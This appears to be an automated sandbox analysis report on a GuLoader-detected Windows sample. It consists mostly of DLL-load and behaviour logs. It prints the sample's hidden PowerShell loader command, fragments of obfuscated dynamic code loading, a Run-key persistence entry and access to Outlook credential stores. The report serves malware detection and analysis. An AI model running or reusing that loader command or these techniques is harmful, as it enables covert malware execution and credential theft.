            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: brandbombernes.lnk.0.drLNK file: ..\Users\user\AppData\Local\Temp\nsy4F91.tmp\cueca.Stu
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: SDWLLRJcsY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbr source: powershell.exe, 00000001.00000002.3164322677.0000000002889000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ore.pdbK source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.3172185585.00000000072D0000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeUnpacked PE file: 11.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeUnpacked PE file: 12.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeUnpacked PE file: 13.2.Conspect124.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Yara detected GuLoader
            Source: Yara matchFile source: 00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kolorittens $Masculate $Unfavourably), (Databasesprogenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Choktilstanden = [AppDomain]::CurrentDomain.GetAs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Spectrograph)), $Optikkens).DefineDynamicModule($Polycladida, $false).DefineType($munster, $Teethbrush, [System.MulticastDelegate])$Ir
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA0AC5 push ebx; iretd 1_2_02DA0AFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA0AFB push ebx; iretd 1_2_02DA0AFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA0B2D push ebx; iretd 1_2_02DA0AFA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA0F43 pushad ; iretd 1_2_02DA0F42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA0F37 pushad ; iretd 1_2_02DA0F42
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02DA12D0 push esp; iretd 1_2_02DA12D9
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BD1219 push esp; iretd 7_2_23BD121A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2806 push ecx; ret 7_2_23BC2819
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Conspect124.exeJump to dropped file
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
            Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Startup keyJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
